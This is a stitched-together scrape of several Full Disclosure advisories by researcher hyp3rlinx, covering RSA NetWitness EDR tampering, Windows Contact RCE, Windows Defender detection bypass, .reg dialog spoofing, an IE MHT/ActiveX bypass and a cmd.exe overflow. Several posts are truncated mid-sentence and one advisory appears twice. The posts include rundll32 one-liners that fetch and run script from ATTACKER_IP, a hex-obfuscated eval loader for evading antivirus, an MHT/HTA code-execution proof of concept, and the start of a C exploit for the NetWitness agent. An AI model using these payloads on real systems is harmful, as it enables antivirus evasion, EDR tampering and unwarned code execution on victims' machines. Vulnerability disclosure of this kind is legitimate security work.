[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E callcs:InitializeCriticalSection .text:0001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:0001400F7B28 callcs:InitializeCriticalSection .text:0001400F7B2E mov edx, 1 ; bManualReset .text:0001400F7B33 xor r9d, r9d; lpName .text:0001400F7B36 mov r8d, edx; bInitialState .text:0001400F7B39 xor ecx, ecx; lpEventAttributes .text:0001400F7B3B callcs:CreateEventW .text:0001400F7B41 mov [rbx+50h], rax .text:0001400F7B45 mov dword ptr [rbx+58h], 0 .text:0001400F7B4C testrax, rax .text:0001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E call
[FD] Microsoft Windows Contact File / Remote Code Execution (Resurrected) CVE-2022-44666
[-] Microsoft Windows Contact file / Remote Code Execution (Resurrected 2022) / CVE-2022-44666 [+] John Page (aka hyp3rlinx) [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec Back in 2018 I discovered three related Windows remote code execution vulnerabilities affecting both VCF and Contact files. They were purchased by Trend Micro Zero Day Initiative (@thezdi) from me and received candidate identifiers ZDI-CAN-6920 and ZDI-CAN-7591. Microsoft as usual denied a fix and it was subsequently dropped as a zero day on January 10, 2019 in coordination with the ZDI program. Almost five years passed, until researcher j00sean resurrected the flaws to add additional protocol vectors LDAP etc. Microsoft finally decided to patch and assign CVE-2022-44666 even though the vulnerabilities are exactly the same. Old 2019 advisories: = 1) Windows VCF RCE http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt 2) Windows Contact HTML injection http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt 3) Windows Contact RCE http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt Circa 2022 updated: = https://github.com/j00sean/CVE-2022-44666#readme https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44666 Additional References: === https://www.zerodayinitiative.com/advisories/ZDI-19-013/ https://www.zdnet.com/article/poc-for-windows-vcf-zero-day-published-online/ https://thehackernews.com/2019/01/vcard-windows-hacking.html https://twitter.com/hyp3rlinx/status/1083528552253919232 https://seclists.org/bugtraq/2019/Jan/43 https://vimeo.com/312824315 https://www.exploit-db.com/exploits/46167 https://www.rapid7.com/db/modules/exploit/windows/fileformat/microsoft_windows_contact/ Special thanks to j00sean for his work and resurrecting this vulnerability from the dead and helping deal with M$ hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
Microsoft Defender Antivirus is a major component of your
next-generation protection in Microsoft Defender for Endpoint. This
protection brings together
machine learning, big-data analysis, in-depth threat resistance
research, and the Microsoft cloud infrastructure to protect devices
(or endpoints) in
your organization. Microsoft Defender Antivirus is built into Windows,
and it works with Microsoft Defender for Endpoint to provide
protection on your
device and in the cloud.
[Vulnerability Type]
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A
[CVE Reference]
N/A
[Security Issue]
Currently, Windows Defender detects and prevents
TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages
rundll32.exe. Attempts at execution fail
and attackers will get an "Access is denied" error message. However,
it can be easily bypassed by passing an extra path traversal when
referencing mshtml.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.
Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
Windows Defender also detects based on the following javascript call
using GetObject("script:http://ATTACKER_IP/hi.tmp;).
However, that interference can be bypassed by using concatenation when
constructing the URL scheme portion of the payload.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp;)
Access is denied.
Full bypass E.g.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp;)
Enter, Backdoor:JS/Relvelshe.A detection.
Windows Defender also prevents downloaded code execution, detected as
"Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it
hits InetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"
However, this is easily bypassed by Hex encoding our payload code new
ActiveXObject("WScript.Shell").Run("calc.exe").
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to
decode it on the fly passing the value to Jscripts builtin eval
function.
[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk=2147752427
Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A=2147744426
Advisory:
https://twitter.com/hyp3rlinx/status/1480651583172091904
[Exploit/PoC]
1) Remote code Jscript component "hi.tmp", host on server port 80, it
pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A
detection.
python -m http.server 80
"hi.tmp"
<![CDATA[
var hex =
"6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp;)
BOOM!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
January 10, 2022 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows .Reg File Dialog Spoof / Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Spoof - Mitigation Bypass [CVE Reference] N/A [Security Issue] Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or whatever else an attacker would like to display. This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the registry security warning dialog box LIE to them as the warning messages are now under an attacker's control. The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user. Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe. Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe .NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft. In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update" Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711 However, the "fix" is easily bypassed and the old payload can still be made to work across systems. Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC. Trojan:Win32/Powessere.G https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk=2147752427 Backdoor:JS/Relvelshe.A https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A=2147744426 Lets begin... My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read. 7FFE7A4A7C83 | EB 0D| jmp ntdll.7FFE7A4A7C92 | 7FFE7A4A7C85 | FF C9| dec ecx | ;This loops thru to read in the path + filename 7FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE 7FFE7A4A7C8C | 74 08| je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes 7FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" 7FFE7A4A7C92 | 85 C9| test ecx,ecx 7FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7 ntdll!woutput_l+0x387: 7ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:01ed`= Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day) to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and with minor tweaks on Win-10. Original works on Win-7, but crashes regedit.exe on Win-10: Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg Original payload (first mitigation bypass) works Win-7/Win-10: Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg New payload mitigation bypass works on both Win-7 and Win-10: Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg However, we are NOT done yet as we must deal with Windows Defender detection preventions. 1) Trojan:Win32/Powessere.G 2) Backdoor:JS/Relvelshe.A Bypassing "Trojan:Win32/Powessere.G" = Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender. A) extra path traversal when referencing mshtml ..\\..\\..\\ B) concatenation when constructing the remote se
[FD] Microsoft Internet Explorer / ActiveX Control Security Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Internet Explorer (MSIE)
Internet Explorer is a discontinued series of graphical web browsers
developed by Microsoft and included in the Microsoft Windows line of
operating systems, starting in 1995.
[Vulnerability Type]
ActiveX Control Security Bypass
[CVE Reference]
N/A
[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer
ActiveX control warnings as well as popup blocker privacy settings are
not enforced.
This can allow the execution of ActiveX content with zero warning to
an unsuspecting end user and or force them to visit arbitrary attacker
controlled websites.
By default when opening browser associated files that contain active
content, MSIE restricts scripts from running without explicit user
interaction and permission.
Instead end users are presented with a yellow warning bar on the
browsers webpage, asking first if they wish to allow the running of
blocked content.
This prevents execution of active content scripts or controls without
the user first clicking the "Allow blocked content" warning bar.
However, specially crafted MHT files residing on disk that contain an
invalid header directive suppress ActiveX warnings and Popup blocker
privacy settings.
Therefore, to bypass Internet Explorer "active content" blocking,
files needs to contain an Content-Location header using an arbitrary
named value E.g.
"Content-Location: PBARBAR"
Note, often times MHT files are set to open in IE by default and IE
while discontinued it is still present on the Windows OS.
Tested successfully on Windows 10 latest fully patched version with
default IE security settings.
Expected result: ActiveX control security warning, prevention of code
execution and blocking browser popup windows.
Actual result: No ActiveX control code execution blocking, security
warnings or browser window popup blocking enforcement.
[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.
[Exploit/POC]
Change [VICTIM] value below to a specified user for testing.
1) Create the MHT PoC file.
"MSIE_ActiveX_Control_Security_Bypass.mht"
From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"
This is a multi-part message in MIME format.
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM
http://www.w3.org/TR/html4/transitional.dtd;>
win=window
win.open("<a rel="nofollow" href="http://www.microsoft.com","","width=600,height=600"">http://www.microsoft.com","","width=600,height=600"</a>;)
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv
.hta', 'pop',
args)
pop.moveTo(2000,2000)
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--
2) Create the PoC HTA file.
"Sales_Report_2021.csv
.hta"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
3) Open the MHT file locally.
[Network Access]
Local
[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk
[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC : July 2, 2019
"We determined that a fix for this issue will be considered in a
future version of this product or service.
At this time, we will not be providing ongoing updates of the status
of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Windows NT Command-line Interpreter "cmd.exe" - Stack Buffer Overflow / PoC Video
https://www.youtube.com/watch?v=wYYgjV-PzD8 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Windows NT Command-line Interpreter "cmd.exe" / Stack Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx, malvuln) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. [Vulnerability Type] Stack Buffer Overflow [CVE Reference] N/A [Security Issue] Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c . [Memory Dump] (660.12d4): Stack buffer overflow - code c409 (first/second chance not available) ntdll!ZwWaitForMultipleObjects+0x14: 7ffb`00a809d4 c3 ret 0:000> .ecxr rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0 rdx=7ff7c0e64534 rsi=200e rdi=200c rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0 r8=200c r9=7ff7c0e60520 r10= r11= r12=02e34d77a810 r13=0002 r14=02e34d796890 r15=200d iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0202 cmd!StripQuotes+0xa8: 7ff7`c0e214f8 cc int 3 0:000> !analyze -v *** * * *Exception Analysis * * * *** Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: cmd!StripQuotes+a8 7ff7`c0e214f8 cc int 3 EXCEPTION_RECORD: -- (.exr 0x) ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8) ExceptionCode: c409 (Stack buffer overflow) ExceptionFlags: 0001 NumberParameters: 1 Parameter[0]: 0008 PROCESS_NAME: cmd.exe ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 0008 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 12d4 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 7ffafcfca9c6 to 7ffb00a809d4 STACK_TEXT: 00f6`a82fea38 7ffa`fcfca9c6 : ` ` ` ` : ntdll!ZwWaitForMultipleObjects+0x14 00f6`a82fea40 7ffa`fcfca8ae : `0098 `0096 `d22d `d22d : KERNELBASE!WaitForMultipleObjectsEx+0x106 00f6`a82fed40 7ffa`fe1d190e : ` 00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe 00f6`a82fed80 7ffa`fe1d150f : ` ` `0003 `0001 : kernel32!WerpReportFaultInternal+0x3ce 00f6`a82feea0 7ffa`fd05976b : ` 00f6`a82ff1d0 `0004 ` : kernel32!WerpReportFault+0x73 00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000 7ff7`c0e3e000 `200e `200c : KERNELBASE!UnhandledExceptionFilter+0x35b 00f6`a82feff0 7ff7`c0e26df6 : 02e3` 7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c : cmd!_raise_securityfailure+0x1a 00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810 ` `0002 `200e : cmd!_report_rangecheckfailure+0xf2 00f6`a82ff0a0 7ff7`c0e2096f : `200c 00f6`a82ff1d0 00f6`a82ff1d0 `200e : cmd!StripQuotes+0xa8 00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90 02e3`4d76ff90 ` 02e3`4d76ff90 : cmd!SearchForExecutable+0x443 00f6`a82ff390 7ff7`c0e1fb9e : ` 02e3`4d76ff90 ` 02e3`4d99 : cmd!ECWork+0x69 00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0 02e3`4d76ff90 0
[FD] Microsoft Windows Command-line Interpreter "cmd.exe" / Stack Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx, malvuln) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. [Vulnerability Type] Stack Buffer Overflow [CVE Reference] N/A [Security Issue] Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c . [Memory Dump] (660.12d4): Stack buffer overflow - code c409 (first/second chance not available) ntdll!ZwWaitForMultipleObjects+0x14: 7ffb`00a809d4 c3 ret 0:000> .ecxr rax=0022 rbx=02e34d796890 rcx=7ff7c0e492c0 rdx=7ff7c0e64534 rsi=200e rdi=200c rip=7ff7c0e214f8 rsp=00f6a82ff0a0 rbp=00f6a82ff1d0 r8=200c r9=7ff7c0e60520 r10= r11= r12=02e34d77a810 r13=0002 r14=02e34d796890 r15=200d iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0202 cmd!StripQuotes+0xa8: 7ff7`c0e214f8 cc int 3 0:000> !analyze -v *** * * *Exception Analysis * * * *** Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: cmd!StripQuotes+a8 7ff7`c0e214f8 cc int 3 EXCEPTION_RECORD: -- (.exr 0x) ExceptionAddress: 7ff7c0e214f8 (cmd!StripQuotes+0x00a8) ExceptionCode: c409 (Stack buffer overflow) ExceptionFlags: 0001 NumberParameters: 1 Parameter[0]: 0008 PROCESS_NAME: cmd.exe ERROR_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 0008 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 12d4 BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE LAST_CONTROL_TRANSFER: from 7ffafcfca9c6 to 7ffb00a809d4 STACK_TEXT: 00f6`a82fea38 7ffa`fcfca9c6 : ` ` ` ` : ntdll!ZwWaitForMultipleObjects+0x14 00f6`a82fea40 7ffa`fcfca8ae : `0098 `0096 `d22d `d22d : KERNELBASE!WaitForMultipleObjectsEx+0x106 00f6`a82fed40 7ffa`fe1d190e : ` 00f6`a82ff1d0 7ff7`c0e3e000 7ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe 00f6`a82fed80 7ffa`fe1d150f : ` ` `0003 `0001 : kernel32!WerpReportFaultInternal+0x3ce 00f6`a82feea0 7ffa`fd05976b : ` 00f6`a82ff1d0 `0004 ` : kernel32!WerpReportFault+0x73 00f6`a82feee0 7ff7`c0e26b6a : 7ff7`c0e3e000 7ff7`c0e3e000 `200e `200c : KERNELBASE!UnhandledExceptionFilter+0x35b 00f6`a82feff0 7ff7`c0e26df6 : 02e3` 7ff7`c0e1 02e3`4d796890 7ff7`c0e6602c : cmd!_raise_securityfailure+0x1a 00f6`a82ff020 7ff7`c0e214f8 : 02e3`4d77a810 ` `0002 `200e : cmd!_report_rangecheckfailure+0xf2 00f6`a82ff0a0 7ff7`c0e2096f : `200c 00f6`a82ff1d0 00f6`a82ff1d0 `200e : cmd!StripQuotes+0xa8 00f6`a82ff0d0 7ff7`c0e239a9 : 02e3`4d76ff90 02e3`4d76ff90 ` 02e3`4d76ff90 : cmd!SearchForExecutable+0x443 00f6`a82ff390 7ff7`c0e1fb9e : ` 02e3`4d76ff90 ` 02e3`4d99 : cmd!ECWork+0x69 00f6`a82ff600 7ff7`c0e1ff35 : 7ff7`c0e4fbb0 02e3`4d76ff90 0
[FD] Recon-Informer v1.3 - Intel for offensive systems anti-reconnaissance (nmap) tool
# -*- coding: utf-8 -*- import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #ReconInformer v1.3 Copyright (c) MIT License #By John Page (aka hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparition...@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #== #Feb 15, 2021 #v1.3 added: using -t flag we can process packets from a specific inbound IP address of interest. #v1.3 added timestamp for the detection results in console output window. #v1.3 fix: utf-8 directive, for encoding error encountered in some older versions of Python. #v1.3 fix: check for where window size is not relevant for UDP packets to prevent errors. #v1.3 removed: script name in console window title to view CL arguments. #v1.3 suppressed: output for fragmented packets that don't show any useful info. #For best realtime console output call ReconInformer using python -u ReconInformer.py ... # #Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_. # #DELETE FW RULE -d to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific 